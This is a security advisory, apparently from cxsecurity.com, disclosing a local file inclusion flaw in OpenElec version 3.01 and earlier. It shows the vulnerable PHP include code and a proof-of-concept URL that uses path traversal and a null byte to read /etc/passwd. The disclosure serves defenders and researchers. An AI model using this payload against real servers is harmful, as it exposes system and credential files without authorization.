OpenElec <= v3.01 (form.php obj) Local File Inclusion Vulnerability

2009.02.05
Credit: dun
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

:::::::-. ... ::::::. :::. ;;, `';, ;; ;;;`;;;;, `;;; `[[ [[[[' [[[ [[[[[. '[[ $$, $$$$ $$$ $$$ "Y$c$$ 888_,o8P'88 .d888 888 Y88 MMMMP"` "YmmMMMM"" MMM YM [ Discovered by dun \ dun[at]strcpy.pl ] ################################################################# # [ OpenElec <= v3.01 ] Local File Inclusion Vulnerability # ################################################################# # # Script site: http://www.openelec.org/ # Download: http://adullact.net/frs/?group_id=434 # # Vuln: # http://site.com/openelec/scr/form.php?obj=../../../../../../../etc/passwd%00 # # # Bug: ./openelec/scr/form.php (lines: 27-32) # # ... # $obj = ""; # if (isset ($_GET ['obj'])) # $obj = $_GET ['obj']; # // # if (file_exists ("../obj/".$obj.".class.php")) # include ("../obj/".$obj.".class.php"); // * LFI * # ... # # ############################################### # Greetz: D3m0n_DE * str0ke * and otherz.. ############################################### [ dun / 2008 ] *******************************************************************************************


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top